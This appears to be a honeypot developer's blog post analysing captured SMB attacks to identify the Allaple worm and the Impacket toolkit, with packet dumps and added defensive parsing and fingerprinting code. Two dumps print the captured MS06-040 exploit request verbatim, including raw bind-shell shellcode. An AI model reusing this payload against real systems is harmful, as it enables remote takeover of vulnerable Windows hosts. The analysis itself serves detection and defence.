Identifying toolkits

Attacks which are identified correctly are rather boring; failing attacks are interesting, as they provide some more information on the problem.

Allaple

This attack came to our attention as it threw an exception in dionaea:

EOFError at EOFError()
/opt/dionaea/lib/dionaea/python/dionaea/ndrlib.py:109 in unpack_long
        raise EOFError
/opt/dionaea/lib/dionaea/python/dionaea/ndrlib.py:119 in unpack_string
        mc = self.unpack_long()
/opt/dionaea/lib/dionaea/python/dionaea/smb/rpcservices.py:2779 in handle_NetPathCanonicalize
        server_unc = x.unpack_string()
/opt/dionaea/lib/dionaea/python/dionaea/smb/rpcservices.py:83 in processrequest
        data = method(con, p)
/opt/dionaea/lib/dionaea/python/dionaea/smb/smb.py:606 in process_dcerpc_packet
        resp = service.processrequest(service, self, dcep.OpNum, dcep)

So, I was provided with the required bitstream to have a look at what was going wrong.

Initially, replaying the bitstream was a problem, as there were many SMB commands in a single chunk; after some changes to the code, replaying worked out. Even though I had the same exception showing up, the attack seemed to be successful, as shellcode was detected and emulated, which resulted in an open port on tcp/9988.

2010-11-12 09:34:34
  connection 705 smbd tcp accept 127.0.0.1:445 <- 127.0.0.1:54255 (705 None)
   dcerpc bind: uuid '4b324fc8-1670-01d3-1278-5a47bf6ee188' (SRVSVC) transfersyntax 8a885d04-1ceb-11c9-9fe8-08002b104860
   dcerpc request: uuid '4b324fc8-1670-01d3-1278-5a47bf6ee188' (SRVSVC) opnum 31 (NetPathCanonicalize (MS08-67))
   dcerpc request: uuid '4b324fc8-1670-01d3-1278-5a47bf6ee188' (SRVSVC) opnum 31 (NetPathCanonicalize (MS08-67))
    connection 706 emulation tcp listen 0.0.0.0:9988 (705 705)

So I was curious why this attack worked out, even though dionaea failed to reply properly to some SMB requests.

Looking at the initial SMB Negotiate … while the dialects offered for negotiation looked rather unsuspicious, the attacker provided a very limited set of features in Flags2; the Windows SMB stack offers at least UNICODE support.

###[ NBT Session Packet sizeof(4) ]### 
  TYPE                = Session Message sizeof(  1) off=  0 goff=  0
  RESERVED            = 0               sizeof(  1) off=  1 goff=  1
  LENGTH              = 168             sizeof(  2) off=  2 goff=  2
###[ SMB Header sizeof(32) ]### 
     Start               = b'\xffSMB'      sizeof(  4) off=  0 goff=  4
     Command             = SMB_COM_NEGOTIATE sizeof(  1) off=  4 goff=  8
     Status              = 0               sizeof(  4) off=  5 goff=  9
     Flags               = CASES_ENSITIVITY sizeof(  1) off=  9 goff= 13
     Flags2              = KNOWS_LONG_NAMES+ERR_STATUS sizeof(  2) off= 10 goff= 14
     PIDHigh             = 0               sizeof(  2) off= 12 goff= 16
     Signature           = 0               sizeof(  8) off= 14 goff= 18
     Unused              = 0               sizeof(  2) off= 22 goff= 26
     TID                 = 0               sizeof(  2) off= 24 goff= 28
     PID                 = 1564            sizeof(  2) off= 26 goff= 30
     UID                 = 0               sizeof(  2) off= 28 goff= 32
     MID                 = 10960           sizeof(  2) off= 30 goff= 34
###[ SMB Negociate_Protocol_Request_Counts sizeof(136) ]### 
        WordCount           = 0               sizeof(  1) off=  0 goff= 36
        ByteCount           = 133             sizeof(  2) off=  1 goff= 37
        \Requests  \
         |###[ SMB Negociate Protocol Request Tail sizeof(24) ]### 
         |  BufferFormat        = 2               sizeof(  1) off=  0 goff= 39
         |  BufferData          = b'PC NETWORK PROGRAM 1.0\x00' sizeof( 23) off=  1 goff= 40
         |###[ SMB Negociate Protocol Request Tail sizeof(25) ]### 
         |  BufferFormat        = 2               sizeof(  1) off=  0 goff= 39
         |  BufferData          = b'MICROSOFT NETWORKS 1.03\x00' sizeof( 24) off=  1 goff= 40
         |###[ SMB Negociate Protocol Request Tail sizeof(24) ]### 
         |  BufferFormat        = 2               sizeof(  1) off=  0 goff= 39
         |  BufferData          = b'MICROSOFT NETWORKS 3.0\x00' sizeof( 23) off=  1 goff= 40
         |###[ SMB Negociate Protocol Request Tail sizeof(11) ]### 
         |  BufferFormat        = 2               sizeof(  1) off=  0 goff= 39
         |  BufferData          = b'LANMAN1.0\x00' sizeof( 10) off=  1 goff= 40
         |###[ SMB Negociate Protocol Request Tail sizeof(11) ]### 
         |  BufferFormat        = 2               sizeof(  1) off=  0 goff= 39
         |  BufferData          = b'LM1.2X002\x00' sizeof( 10) off=  1 goff= 40
         |###[ SMB Negociate Protocol Request Tail sizeof(11) ]### 
         |  BufferFormat        = 2               sizeof(  1) off=  0 goff= 39
         |  BufferData          = b'LANMAN2.1\x00' sizeof( 10) off=  1 goff= 40
         |###[ SMB Negociate Protocol Request Tail sizeof(15) ]### 
         |  BufferFormat        = 2               sizeof(  1) off=  0 goff= 39
         |  BufferData          = b'NT LANMAN 1.0\x00' sizeof( 14) off=  1 goff= 40
         |###[ SMB Negociate Protocol Request Tail sizeof(12) ]### 
         |  BufferFormat        = 2               sizeof(  1) off=  0 goff= 39
         |  BufferData          = b'NT LM 0.12\x00' sizeof( 11) off=  1 goff= 40

The Sessionsetup Request tried to log in as ADMIN:

###[ SMB Sessionsetup AndX Request2 sizeof(168) ]### 
        WordCount           = 13              sizeof(  1) off=  0 goff= 36
        AndXCommand         = SMB_COM_NONE    sizeof(  1) off=  1 goff= 37
        AndXReserved        = 0               sizeof(  1) off=  2 goff= 38
        AndXOffset          = 0               sizeof(  2) off=  3 goff= 39
        MaxBufferSize       = 17408           sizeof(  2) off=  5 goff= 41
        MaxMPXCount         = 2               sizeof(  2) off=  7 goff= 43
        VCNumber            = 2556            sizeof(  2) off=  9 goff= 45
        SessionKey          = 0               sizeof(  4) off= 11 goff= 47
        PasswordLength      = 24              sizeof(  2) off= 15 goff= 51
        UnicodePasswordLength= 24              sizeof(  2) off= 17 goff= 53
        Reserved2           = 0               sizeof(  4) off= 19 goff= 55
        Capabilties         = NT_SMBS+RPC_REMOTE_APIS+STATUS32+LEVEL_II_OPLOCKS sizeof(  4) off= 23 goff= 59
        ByteCount           = 91              sizeof(  2) off= 27 goff= 63
        Password            = b'\xa8\xa7\xc0]\xc8\xb7\x7f\xde\xa9\xb2Y\xacWRyux\xd3\x8f1\x06?|)' sizeof( 24) off= 29 goff= 65
        UnicodePassword     = b'\x1f\x08Oh8\xb4Y\x95\xaa(J\x18o\x89,&G\x99\xc8\x99\xe7MZ\x05' sizeof( 24) off= 53 goff= 89
        Account             = b'ADMIN\x00'    sizeof(  6) off= 77 goff=113
        PrimaryDomain       = b' \x00'        sizeof(  2) off= 83 goff=119
        NativeOS            = b'Windows 2000 2195\x00' sizeof( 18) off= 85 goff=121
        NativeLanManager    = b'Windows 2000 5.0\x00' sizeof( 17) off=103 goff=139
        Extrabytes          = b'\x00'         sizeof( 48) off=120 goff=156

The Treeconnect tried to connect to \\*SMBSERVER\IPC$, which is a first hint at the toolkit used to run the attack, Impacket; by default, however, Impacket only negotiates NT LM 0.12 as dialect.

###[ SMB Treeconnect AndX Request sizeof(36) ]### 
        WordCount           = 4               sizeof(  1) off=  0 goff= 36
        AndXCommand         = SMB_COM_NONE    sizeof(  1) off=  1 goff= 37
        Reserved1           = 0               sizeof(  1) off=  2 goff= 38
        AndXOffset          = 0               sizeof(  2) off=  3 goff= 39
        Flags               = 0x0             sizeof(  2) off=  5 goff= 41
        PasswordLength      = 1               sizeof(  2) off=  7 goff= 43
        ByteCount           = 25              sizeof(  2) off=  9 goff= 45
        Password            = b'\x00'         sizeof(  1) off= 11 goff= 47
        Path                = b'\\\\*SMBSERVER\\IPC$\x00' sizeof( 18) off= 12 goff= 48
        Service             = b'?????\x00'    sizeof(  6) off= 30 goff= 66
        Extrabytes          = b'\x00'         sizeof(  0) off= 36 goff= 72

NTcreate \\srvsvc was rather innocent, but …

###[ SMB NTcreate AndX Request sizeof(59) ]### 
        WordCount           = 24              sizeof(  1) off=  0 goff= 36
        AndXCommand         = SMB_COM_NONE    sizeof(  1) off=  1 goff= 37
        Reserved1           = 0               sizeof(  1) off=  2 goff= 38
        AndXOffset          = 0               sizeof(  2) off=  3 goff= 39
        Reserved2           = 0               sizeof(  1) off=  5 goff= 41
        FilenameLen         = 7               sizeof(  2) off=  6 goff= 42
        CreateFlags         = 0x00000002+EXCL_OPLOCK+CREATE_DIRECTORY sizeof(  4) off=  8 goff= 44
        RootFID             = 0x0             sizeof(  4) off= 12 goff= 48
        AccessMask          = READ+WRITE+APPEND+READ_EA+WRITE_EA+READ_ATTR+WRITE_ATTR+READ_CTRL sizeof(  4) off= 16 goff= 52
        AllocationSize      = 0               sizeof(  8) off= 20 goff= 56
        FileAttributes      = 0x00000000      sizeof(  4) off= 28 goff= 64
        ShareAccess         = READ+WRITE+DELETE sizeof(  4) off= 32 goff= 68
        Disposition         = 1               sizeof(  4) off= 36 goff= 72
        CreateOptions       = NONDIRECTORY    sizeof(  4) off= 40 goff= 76
        Impersonation       = 2               sizeof(  4) off= 44 goff= 80
        SecurityFlags       = 0x00            sizeof(  1) off= 48 goff= 84
        ByteCount           = 8               sizeof(  2) off= 49 goff= 85
        Filename            = b'\\srvsvc\x00' sizeof(  8) off= 51 goff= 87
        Extrabytes          = b''             sizeof(  0) off= 59 goff= 95

The following Trans requested to bind SRVSVC.

###[ SMB Trans Request sizeof(42) ]### 
        WordCount           = 16              sizeof(  1) off=  0 goff= 36
        TotalParamCount     = 0               sizeof(  2) off=  1 goff= 37
        TotalDataCount      = 72              sizeof(  2) off=  3 goff= 39
        MaxParamCount       = 1024            sizeof(  2) off=  5 goff= 41
        MaxDataCount        = 65504           sizeof(  2) off=  7 goff= 43
        MaxSetupCount       = 0               sizeof(  1) off=  9 goff= 45
        Reserved1           = 0               sizeof(  1) off= 10 goff= 46
        Flags               = 0x0             sizeof(  2) off= 11 goff= 47
        Timeout             = 0               sizeof(  4) off= 13 goff= 49
        Reserved2           = 0               sizeof(  2) off= 17 goff= 53
        ParamCount          = 0               sizeof(  2) off= 19 goff= 55
        ParamOffset         = 74              sizeof(  2) off= 21 goff= 57
        DataCount           = 72              sizeof(  2) off= 23 goff= 59
        DataOffset          = 74              sizeof(  2) off= 25 goff= 61
        SetupCount          = 2               sizeof(  1) off= 27 goff= 63
        Reserved3           = 0               sizeof(  1) off= 28 goff= 64
        Setup               = [9728,64]       sizeof(  4) off= 29 goff= 65
        ByteCount           = 79              sizeof(  2) off= 33 goff= 69
        TransactionName     = b'\\PIPE\\\x00' sizeof(  7) off= 35 goff= 71
        Pad                 = b''             sizeof(  0) off= 42 goff= 78
        Param               = []              sizeof(  0) off= 42 goff= 78
        Pad1                = b''             sizeof(  0) off= 42 goff= 78
###[ DCERPC Header sizeof(16) ]### 
           Version             = 5               sizeof(  1) off=  0 goff= 78
           VersionMinor        = 0               sizeof(  1) off=  1 goff= 79
           PacketType          = Bind            sizeof(  1) off=  2 goff= 80
           PacketFlags         = 0x3             sizeof(  1) off=  3 goff= 81
           DataRepresentation  = 16              sizeof(  4) off=  4 goff= 82
           FragLen             = 72              sizeof(  2) off=  8 goff= 86
           AuthLen             = 0               sizeof(  2) off= 10 goff= 88
           CallID              = 0               sizeof(  4) off= 12 goff= 90
###[ DCERPC Bind sizeof(56) ]### 
              MaxTransmitFrag     = 5840            sizeof(  2) off=  0 goff= 94
              MaxReceiveFrag      = 5840            sizeof(  2) off=  2 goff= 96
              AssocGroup          = 0x0             sizeof(  4) off=  4 goff= 98
              NumCtxItems         = 1               sizeof(  1) off=  8 goff=102
              FixGap              = b'\x00\x00\x00' sizeof(  3) off=  9 goff=103
              \CtxItems  \
               |###[ DCERPC CtxItem sizeof(44) ]### 
               |  ContextID           = 0               sizeof(  2) off=  0 goff=106
               |  NumTransItems       = 1               sizeof(  1) off=  2 goff=108
               |  FixGap              = 0               sizeof(  1) off=  3 goff=109
               |  UUID                = 4b324fc8-1670-01d3-1278-5a47bf6ee188 sizeof( 16) off=  4 goff=110
               |  InterfaceVer        = 3               sizeof(  2) off= 20 goff=126
               |  InterfaceVerMinor   = 0               sizeof(  2) off= 22 goff=128
               |  TransferSyntax      = 8a885d04-1ceb-11c9-9fe8-08002b104860 sizeof( 16) off= 24 goff=130
               |  TransferSyntaxVersion= 2               sizeof(  4) off= 40 goff=146

Now I was expecting a call on SRVSVC, and the attacker issued a Write.

###[ SMB Write AndX Request sizeof(827) ]### 
        WordCount           = 14              sizeof(  1) off=  0 goff= 36
        AndXCommand         = SMB_COM_NONE    sizeof(  1) off=  1 goff= 37
        AndXReserved        = 0               sizeof(  1) off=  2 goff= 38
        AndXOffset          = 0               sizeof(  2) off=  3 goff= 39
        FID                 = 0x4000          sizeof(  2) off=  5 goff= 41
        Offset              = 0               sizeof(  4) off=  7 goff= 43
        Reserved2           = 0xffffffff      sizeof(  4) off= 11 goff= 47
        WriteMode           = MSGSTART        sizeof(  2) off= 15 goff= 51
        Remaining           = 796             sizeof(  2) off= 17 goff= 53
        DataLenHigh         = 0               sizeof(  2) off= 19 goff= 55
        DataLenLow          = 796             sizeof(  2) off= 21 goff= 57
        DataOffset          = 63              sizeof(  2) off= 23 goff= 59
        HighOffset          = 0               sizeof(  4) off= 25 goff= 61
        ByteCount           = 796             sizeof(  2) off= 29 goff= 65
        Padding             = b''             sizeof(  0) off= 31 goff= 67
        Data                = b"\x05\x00\x00\x01\x10\x00\x00\x00\x1c\x03\x00\x00\x00\x00\x00\x00\x04\x03\x00\x00\x00\x00\x1f\x00\xff\xff\xff\xff\x01\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00c\x01\x00\x00\x00\x00\x00\x00c\x01\x00\x00\x81\xc4\xff\xef\xff\xffD\x8b\xec\xeb\x02\xebk\xe8\xf9\xff\xff\xffSUVW\x8bl$\x18\x8bE<\x8bT(x\x03\xd5\x8bJ\x18\x8bZ \x03\xdd\xe32I\x8b4\x8b\x03\xf53\xff\xfc3\xc0\xac8\xe0t\x07\xc1\xcf\r\x03\xf8\xeb\xf2;|$\x14u\xe1\x8bZ$\x03\xddf\x8b\x0cK\x8bZ\x1c\x03\xdd\x8b\x04\x8b\x03\xc5\xeb\x023\xc0_^][\x89D$\x04\x8b\x04$\x89D$\x08\x8bD$\x04\x83\xc4\x08\xc33\xc0d\x03@0\x8b@\x0c\x8bp\x1c\xad\x8bx\x08^3\xc0Ph.exe\x89e\x14Wh\xeaI\x8a\xe8\xff\xd6j\x06\xffu\x14\xff\xd0\x89E\x04Wh\xdb\x8a#\xe9\xff\xd6\x89E\x0cWh\x8eN\x0e\xec\xff\xd63\xc9f\xb9llQh32.dhws2_T\xff\xd0\x8b\xd8Sh\xb6\x19\x18\xe7\xff\xd6\x89E\x10Sh\xe7y\xc6y\xff\xd6\x89E\x18Shn\x0b/I\xff\xd6j\x06j\x01j\x02\xff\xd0\x89E\x003\xc0PPP\xb8\x02\xff'\x04\x80\xf4\xffP\x8b\xc4j\x10P\xffu\x00Sh\xa4\x1ap\xc7\xff\xd6\xff\xd0PSh\xa4\xad.\xe9\xff\xd6\xffu\x00\xff\xd0PP\xffu\x00Sh\xe5I\x86I\xff\xd6\xff\xd0\x89E\x00\x81\xc4\xfc\xfe\xff\xff\x8b\xdc3\xc9Q\xb1\xffQS\xffu\x00\xffU\x10\x85\xc0~\nPS\xffu\x04\xffU\x0c\xeb\xe5Wh[L\x1a\xdd\xff\xd6\xffu\x04\xff\xd03\xc0P\xffu\x14Wh\x98\xfe\x8a\x0e\xff\xd6\xff\xd0Wh\xef\xce\xe0`\xff\xd6\xff\xd0AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\n\x08\x02\x00AAAAAAAA\x04\x08\x02\x00AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\x04\x08\x02\x00AAAAAAAA\x04\x08\x02\x00AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\x00\x00\x00\x00\xd7\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\xcb\x00\x00\x00\x00\x00\x00\x00" sizeof(796) off= 31 goff= 67

The Data resembled a DCERPC request, opnum 31 on SRVSVC, which is NetPathCanonicalize, so this was either MS08-067 or MS06-040, depending on the arguments provided.

###[ DCERPC Header sizeof(16) ]### 
  Version             = 5               sizeof(  1) off=  0 goff=  0
  VersionMinor        = 0               sizeof(  1) off=  1 goff=  1
  PacketType          = Request         sizeof(  1) off=  2 goff=  2
  PacketFlags         = 0x1             sizeof(  1) off=  3 goff=  3
  DataRepresentation  = 16              sizeof(  4) off=  4 goff=  4
  FragLen             = 796             sizeof(  2) off=  8 goff=  8
  AuthLen             = 0               sizeof(  2) off= 10 goff= 10
  CallID              = 0               sizeof(  4) off= 12 goff= 12
###[ DCERPC Request sizeof(780) ]### 
     AllocHint           = 772             sizeof(  4) off=  0 goff= 16
     ContextID           = 0               sizeof(  2) off=  4 goff= 20
     OpNum               = 31              sizeof(  2) off=  6 goff= 22
     StubData            = b"\xff\xff\xff\xff\x01\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00c\x01\x00\x00\x00\x00\x00\x00c\x01\x00\x00\x81\xc4\xff\xef\xff\xffD\x8b\xec\xeb\x02\xebk\xe8\xf9\xff\xff\xffSUVW\x8bl$\x18\x8bE<\x8bT(x\x03\xd5\x8bJ\x18\x8bZ \x03\xdd\xe32I\x8b4\x8b\x03\xf53\xff\xfc3\xc0\xac8\xe0t\x07\xc1\xcf\r\x03\xf8\xeb\xf2;|$\x14u\xe1\x8bZ$\x03\xddf\x8b\x0cK\x8bZ\x1c\x03\xdd\x8b\x04\x8b\x03\xc5\xeb\x023\xc0_^][\x89D$\x04\x8b\x04$\x89D$\x08\x8bD$\x04\x83\xc4\x08\xc33\xc0d\x03@0\x8b@\x0c\x8bp\x1c\xad\x8bx\x08^3\xc0Ph.exe\x89e\x14Wh\xeaI\x8a\xe8\xff\xd6j\x06\xffu\x14\xff\xd0\x89E\x04Wh\xdb\x8a#\xe9\xff\xd6\x89E\x0cWh\x8eN\x0e\xec\xff\xd63\xc9f\xb9llQh32.dhws2_T\xff\xd0\x8b\xd8Sh\xb6\x19\x18\xe7\xff\xd6\x89E\x10Sh\xe7y\xc6y\xff\xd6\x89E\x18Shn\x0b/I\xff\xd6j\x06j\x01j\x02\xff\xd0\x89E\x003\xc0PPP\xb8\x02\xff'\x04\x80\xf4\xffP\x8b\xc4j\x10P\xffu\x00Sh\xa4\x1ap\xc7\xff\xd6\xff\xd0PSh\xa4\xad.\xe9\xff\xd6\xffu\x00\xff\xd0PP\xffu\x00Sh\xe5I\x86I\xff\xd6\xff\xd0\x89E\x00\x81\xc4\xfc\xfe\xff\xff\x8b\xdc3\xc9Q\xb1\xffQS\xffu\x00\xffU\x10\x85\xc0~\nPS\xffu\x04\xffU\x0c\xeb\xe5Wh[L\x1a\xdd\xff\xd6\xffu\x04\xff\xd03\xc0P\xffu\x14Wh\x98\xfe\x8a\x0e\xff\xd6\xff\xd0Wh\xef\xce\xe0`\xff\xd6\xff\xd0AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\n\x08\x02\x00AAAAAAAA\x04\x08\x02\x00AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\x04\x08\x02\x00AAAAAAAA\x04\x08\x02\x00AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\x00\x00\x00\x00\xd7\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\xcb\x00\x00\x00\x00\x00\x00\x00" sizeof(772) off=  8 goff= 24

But even though the attacker had already sent his shellcode, and dionaea did not reply to the NetPathCanonicalize call, he would continue to send requests on SRVSVC/NetPathCanonicalize, including this one:

###[ DCERPC Header sizeof(16) ]### 
           Version             = 5               sizeof(  1) off=  0 goff= 78
           VersionMinor        = 0               sizeof(  1) off=  1 goff= 79
           PacketType          = Request         sizeof(  1) off=  2 goff= 80
           PacketFlags         = 0x2             sizeof(  1) off=  3 goff= 81
           DataRepresentation  = 16              sizeof(  4) off=  4 goff= 82
           FragLen             = 28              sizeof(  2) off=  8 goff= 86
           AuthLen             = 0               sizeof(  2) off= 10 goff= 88
           CallID              = 0               sizeof(  4) off= 12 goff= 90
###[ DCERPC Request sizeof(12) ]### 
              AllocHint           = 4               sizeof(  4) off=  0 goff= 94
              ContextID           = 0               sizeof(  2) off=  4 goff= 98
              OpNum               = 31              sizeof(  2) off=  6 goff=100
              StubData            = b'\x00\x00\x00\x00' sizeof(  4) off=  8 goff=102

This is the request dionaea failed to parse properly, as the StubData is way too short for a proper NetPathCanonicalize call.
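The failure above is a parser that trusts the stub length implied by the opnum. As an added example (my own code, not dionaea's ndrlib or rpcservices), here is a minimal NDR reader in the same style plus a NetPathCanonicalize handler that turns a short or inconsistent stub into a logged "malformed" result instead of a traceback. The field order follows MS-SRVS; the reader, the builder and the sample path are constructed for the example.

```python
import struct


class NdrReader:
    """Minimal NDR reader mirroring the unpack_long/unpack_string calls in the
    traceback (hypothetical re-implementation, not dionaea's ndrlib)."""

    def __init__(self, data):
        self.data = data
        self.pos = 0

    def remaining(self):
        return len(self.data) - self.pos

    def align(self, n=4):
        self.pos += (-self.pos) % n

    def unpack_long(self):
        # Bounds check first: a 4-byte stub has exactly one long in it.
        if self.remaining() < 4:
            raise EOFError("need 4 bytes at offset %d, have %d"
                           % (self.pos, self.remaining()))
        (value,) = struct.unpack_from("<I", self.data, self.pos)
        self.pos += 4
        return value

    def unpack_string(self):
        """Conformant varying UTF-16LE string: max count, offset, actual count, chars."""
        max_count = self.unpack_long()
        offset = self.unpack_long()
        actual = self.unpack_long()
        if offset != 0 or actual > max_count:
            raise ValueError("inconsistent string header")
        nbytes = actual * 2
        if self.remaining() < nbytes:
            raise EOFError("string body truncated")
        text = self.data[self.pos:self.pos + nbytes].decode("utf-16-le")
        self.pos += nbytes
        self.align(4)
        return text.rstrip("\x00")


def parse_net_path_canonicalize(stub):
    """Decode a NetPathCanonicalize (SRVSVC opnum 31) stub.

    Layout per MS-SRVS: [unique] ServerName, PathName, OutbufLen, Prefix,
    PathType, Flags. Raises EOFError/ValueError on bad input.
    """
    r = NdrReader(stub)
    server = r.unpack_string() if r.unpack_long() != 0 else None  # referent id
    path = r.unpack_string()
    outbuf_len = r.unpack_long()
    prefix = r.unpack_string()
    path_type = r.unpack_long()
    flags = r.unpack_long()
    return {"server": server, "path": path, "outbuf_len": outbuf_len,
            "prefix": prefix, "path_type": path_type, "flags": flags}


def handle_net_path_canonicalize(stub):
    """Honeypot-side wrapper: a malformed stub is a result to log, not a crash."""
    try:
        args = parse_net_path_canonicalize(stub)
    except (EOFError, ValueError) as exc:  # UnicodeDecodeError is a ValueError
        return {"status": "malformed", "reason": str(exc), "stub_len": len(stub)}
    return {"status": "ok", "args": args}


def ndr_string(s):
    """Encode a conformant varying wide string with trailing NUL and padding."""
    wide = (s + "\x00").encode("utf-16-le")
    count = len(wide) // 2
    body = struct.pack("<III", count, 0, count) + wide
    return body + b"\x00" * ((-len(body)) % 4)


def build_stub(server, path, outbuf_len, prefix, path_type, flags):
    """Constructed well-formed stub in the layout the captured 772-byte one uses."""
    out = struct.pack("<I", 0xFFFFFFFF) + ndr_string(server)
    out += ndr_string(path) + struct.pack("<I", outbuf_len) + ndr_string(prefix)
    return out + struct.pack("<II", path_type, flags)


# Sample inputs: the 4-byte StubData quoted above, and a constructed benign call.
SHORT_STUB = b"\x00\x00\x00\x00"
GOOD_STUB = build_stub("", "\\\\share\\dir\\file.txt", 1024, "", 1, 0)

if __name__ == "__main__":
    print(handle_net_path_canonicalize(SHORT_STUB))
    print(handle_net_path_canonicalize(GOOD_STUB))
```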

According to VirusTotal the malware is Allaple, or something else. Allaple may be correct, as the vulnerability used is MS06-040 (judging by the arguments provided to NetPathCanonicalize; MS08-067 needs some ".." sequences in the path to trigger the bug).

I was unable to get pcap traces for Allaple to compare with, or a detailed reverse engineering, but I'm pretty confident the exploit Allaple sends consists of static chunks captured from Impacket.

Impacket

The plain ASCII SMBSERVER string from the previously outlined attack was easy to grep for, and Tillmann came back with another attack with similar characteristics … basically, it matched the grep.

Zero Flags, zero Flags2, only NT LM 0.12 offered as dialect: maybe Impacket?

###[ NBT Session Packet sizeof(4) ]### 
  TYPE                = Session Message sizeof(  1) off=  0 goff=  0
  RESERVED            = 0               sizeof(  1) off=  1 goff=  1
  LENGTH              = 47              sizeof(  2) off=  2 goff=  2
###[ SMB Header sizeof(32) ]### 
     Start               = b'\xffSMB'      sizeof(  4) off=  0 goff=  4
     Command             = SMB_COM_NEGOTIATE sizeof(  1) off=  4 goff=  8
     Status              = 0               sizeof(  4) off=  5 goff=  9
     Flags               = 0x00            sizeof(  1) off=  9 goff= 13
     Flags2              = 0x0000          sizeof(  2) off= 10 goff= 14
     PIDHigh             = 0               sizeof(  2) off= 12 goff= 16
     Signature           = 0               sizeof(  8) off= 14 goff= 18
     Unused              = 0               sizeof(  2) off= 22 goff= 26
     TID                 = 0               sizeof(  2) off= 24 goff= 28
     PID                 = 10948           sizeof(  2) off= 26 goff= 30
     UID                 = 0               sizeof(  2) off= 28 goff= 32
     MID                 = 0               sizeof(  2) off= 30 goff= 34
###[ SMB Negociate_Protocol_Request_Counts sizeof(15) ]### 
        WordCount           = 0               sizeof(  1) off=  0 goff= 36
        ByteCount           = 12              sizeof(  2) off=  1 goff= 37
        \Requests  \
         |###[ SMB Negociate Protocol Request Tail sizeof(12) ]### 
         |  BufferFormat        = 2               sizeof(  1) off=  0 goff= 39
         |  BufferData          = b'NT LM 0.12\x00' sizeof( 11) off=  1 goff= 40
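To turn the negotiate traits used here and in the Allaple section above into a repeatable check, here is an added example (my own code, not dionaea's or Impacket's): it rebuilds both negotiate requests from the quoted dumps, parses them back with length checks, and classifies them by Flags, Flags2 and the dialect list. The flag bit values are the SMB1 ones from MS-CIFS; the builder, parser and fingerprint function are assumptions of the example.

```python
import struct

SMB_COM_NEGOTIATE = 0x72
SMB_FLAGS_CASE_INSENSITIVE = 0x08      # rendered as CASES_ENSITIVITY in the dump
SMB_FLAGS2_KNOWS_LONG_NAMES = 0x0001
SMB_FLAGS2_NT_STATUS = 0x4000          # rendered as ERR_STATUS in the dump
SMB_FLAGS2_UNICODE = 0x8000

SMB_HEADER = "<4sBIBHH8sHHHHH"          # magic, cmd, status, flags, flags2, pidhigh,
                                        # signature, unused, tid, pid, uid, mid


def build_negotiate(flags, flags2, pid, mid, dialects):
    """Build an NBT-framed SMB_COM_NEGOTIATE request (constructed test input)."""
    body = b"".join(b"\x02" + d.encode("ascii") + b"\x00" for d in dialects)
    hdr = struct.pack(SMB_HEADER, b"\xffSMB", SMB_COM_NEGOTIATE, 0, flags, flags2,
                      0, b"\x00" * 8, 0, 0, pid, 0, mid)
    smb = hdr + struct.pack("<BH", 0, len(body)) + body   # WordCount, ByteCount
    return struct.pack(">BBH", 0x00, 0, len(smb)) + smb    # NBT session message


def parse_negotiate(data):
    """Parse the request back into the fields used for fingerprinting.

    Raises ValueError on truncated or malformed input instead of IndexError.
    """
    if len(data) < 4 + 32 + 3:
        raise ValueError("truncated NBT/SMB header")
    nbt_type, _, nbt_len = struct.unpack(">BBH", data[:4])
    if nbt_type != 0 or nbt_len != len(data) - 4:
        raise ValueError("NBT length does not match payload")
    (magic, command, _status, flags, flags2, _pidhigh, _sig, _unused,
     _tid, pid, _uid, mid) = struct.unpack(SMB_HEADER, data[4:36])
    if magic != b"\xffSMB" or command != SMB_COM_NEGOTIATE:
        raise ValueError("not an SMB_COM_NEGOTIATE request")
    word_count, byte_count = struct.unpack("<BH", data[36:39])
    if word_count != 0 or byte_count != len(data) - 39:
        raise ValueError("bad WordCount/ByteCount")
    dialects = []
    buf = data[39:]
    while buf:
        if buf[0] != 0x02:
            raise ValueError("dialect entry without BufferFormat 0x02")
        end = buf.find(b"\x00", 1)
        if end < 0:
            raise ValueError("unterminated dialect string")
        dialects.append(buf[1:end].decode("ascii", "replace"))
        buf = buf[end + 1:]
    return {"flags": flags, "flags2": flags2, "pid": pid, "mid": mid,
            "dialects": dialects}


def fingerprint(fields):
    """Classify a negotiate by the traits the post relies on; returns (label, notes)."""
    notes = []
    if fields["flags"] == 0 and fields["flags2"] == 0:
        notes.append("zero Flags/Flags2")
    elif not fields["flags2"] & SMB_FLAGS2_UNICODE:
        notes.append("no UNICODE in Flags2 (the Windows stack offers it)")
    if fields["dialects"] == ["NT LM 0.12"]:
        notes.append("only NT LM 0.12 offered")
    if len(notes) == 2 and notes[0] == "zero Flags/Flags2":
        return "impacket-like", notes
    if notes:
        return "non-windows-client", notes
    return "unremarkable", notes


# Constructed from the two negotiate dumps quoted in the post.
ALLAPLE_NEGOTIATE = build_negotiate(
    SMB_FLAGS_CASE_INSENSITIVE, SMB_FLAGS2_KNOWS_LONG_NAMES | SMB_FLAGS2_NT_STATUS,
    1564, 10960,
    ["PC NETWORK PROGRAM 1.0", "MICROSOFT NETWORKS 1.03", "MICROSOFT NETWORKS 3.0",
     "LANMAN1.0", "LM1.2X002", "LANMAN2.1", "NT LANMAN 1.0", "NT LM 0.12"])
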